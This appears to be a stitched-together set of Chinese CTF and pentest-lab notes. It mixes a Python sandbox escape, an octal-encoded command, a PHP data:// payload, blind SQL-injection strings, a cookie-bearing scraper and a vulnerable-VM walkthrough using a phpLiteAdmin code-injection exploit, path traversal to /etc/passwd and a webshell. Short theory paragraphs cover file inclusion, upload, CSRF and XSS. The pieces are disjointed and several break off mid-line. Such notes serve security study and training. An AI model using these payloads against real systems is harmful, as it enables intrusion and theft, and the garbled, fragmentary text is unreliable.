os.system('cat /flag')
然后转八进制
\157\163\56\163\171\163\164\145\155\50\47\143\141\164\40\57\146\154\141\147\47\51
了解php为协议即可做出来
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKT8%2B
?student_name=Bob'and'3'>'2%23
//f.__globals__['__builtins__'].__import__('os').system('cat /flag')
你被豌豆关在一个监狱里,,,,,,
豌豆百密一疏,不小心遗漏了一些东西,,,
def ev4l(*args):
print(secret)
inp = input("> ")
f = lambda: None
print(eval(inp, {"__builtins__": None, 'f': f, 'eval': ev4l}))
能不能逃出去给豌豆踩踩背就看你自己了,臭皮,,
> f.__globals__['__builtins__'].__import__('os').system('cat /flag')
flag{a7e1ff73-81a6-4253-9f21-5d552b0dabfd}
0
//获取数据库名称长度length(database())>2
?student_name=Bob'AND%0B(SELECT%0BLEFT(database(),3))%0BLIKE'ctf'%23 ///数据库名称为ctf
Bob'AND%0B(SELECT%0Bdatabase())%0BLIKE%0B'ctf'%23
//表名数量
student_name=Bob'AND%0B(SELECT%0BCOUNT(*)%0BFROM%0Binformation_schema.tables%0BWHERE%0Btable_schema%0BLIKE%0B'c
import requests
from bs4 import BeautifulSoup
import time
# 创建会话
session = requests.Session()
# 定义 URL
url = 'http://eci-2zecn3tukijkvltao8o0.cloudeci1.ichunqiu.com/start' # 启动页面 URL
submit_url = 'http://eci-2zecn3tukijkvltao8o0.cloudeci1.ichunqiu.com/submit' # 提交数据的 URL
# 定义 Cookie
cookies = {
'session': '.eJw1j8FOAzEMRH9llDOKaEEt7RfAuUgckdWY3dDEQYmXsEL8O94tSLEUeTxv7G_XlKq-aszsjpv99mF72N_d7vzm_rCzd-OUv9Qd3Qujx5TwGVtU6MjIU-MpQ0sutZbu8YTEVIUDCMIdvdRgcqDZ42QGpWkYFZkxlm4CLhJ1sb2VSRZTKClRRZGVP9Sl7fFs_3i2PE5q7HhVO9WMNonHI4PlvcwNY7xEGf4nstmVorQr4kyKZvVHz7RGr-cYNc-WRxI-qLJoQ6KmOFm-Le9-fgGmXGS0.ZwO5Wg.7JJgjPk_iFRWOb39h2myyLZa4wE'
}
# 抓取并提取变动的句子
def get_sentences():
response = session.get(url, cookies=cookies) # 请求时带上 Cookie
soup = BeautifulSoup(response.text, 'html.parser')
# 假设句子在某个特定的标签中,如 <p> 标签
sentences = [p.text for p in soup.find_all('p')]
return sentences[:8] # 假设最多提取 8 个句子
# 检查是否是 index 页面
1. 为什么要抓包? 抓包应用的资产信息进行安全测试
2. 抓包对象有哪些? 小程序、APP、桌面应用等
3. 抓包协议区别工具? 有部分应用不走HTTP/S,需要用到全局协议抓包
4. 封包和抓包的不同之处? 零散整体的区别,封包能精确到每个操作的数据包
文件包含漏洞是一种Web安全漏洞,它允许攻击者包含恶意文件的内容到Web应用程序中。这通常是通过使用文件包含函数来实现的,这些函数允许将一个文件的代码包含到另一个文件中。如果攻击者能够控制包含的文件,他们就可以在Web应用程序中执行任意代码。
以下是一些常见的文件包含函数及其区别:
可以使用多种方法来防御文件包含漏洞。一些最常见的方法包括:
filter_input()
函数,该函数可以帮助防止包含恶意文件。以下是一些常见的命令执行函数:
以下是一些常见的代码执行函数:
文件上传漏洞是Web安全中常见的一种漏洞,是指攻击者利用Web应用程序允许用户上传文件的功能,将恶意文件上传到服务器并执行,从而获取服务器控制权或其他非法目的。
文件上传漏洞产生的主要原因是服务器端对用户上传的文件没有进行严格的检查和过滤,导致攻击者可以上传恶意文件。常见的原因包括:
文件上传漏洞的危害非常严重,攻击者可以利用该漏洞进行以下攻击:
CSRF(Cross-site request forgery),中文名称:跨站请求伪造的。
CSRF攻击是一种利用网站可信用户的权限去执行未授权的命令的一种恶意攻击。攻击者会欺骗用户在他们不知情的情况下,向受信任的网站发送恶意请求。由于浏览器会自动携带用户的Cookie和Session信息,导致网站会认为该请求是来自可信用户的,从而执行攻击者的恶意操作。
XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的网络安全漏洞,它允许恶意用户将客户端脚本注入到网页中,使其在用户浏览器中执行。XSS 攻击通常通过将恶意脚本代码插入到网页中的输入数据中来实现,例如用户提交的表单数据、URL 参数或网页中的动态内容。
htmlspecialchars()
)对特殊字符进行转义,防止其被解释为 HTML 或 JavaScript 代码。
arp-scan -l
nmap -sV -sC -A -p- 192.168.2.204
扫描下目录
dirb http://192.168.2.204
用弱口令admin登录,发现是一个SQLite数据库管理工具
搜索一下phpLiteAdmin v1.9.3是否存在可以利用的漏洞
选择了24404.txt
1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php
根据给的提示信息,先创建一个数据库.
http://192.168.2.204/view.php?page=../../../../etc/passwd
http://192.168.2.204/view.php?page=../../../usr/databases/hack.php
使用蚁剑连接
进入zico家目录后,发现了wordpress目录,进去发现有一个wp-conf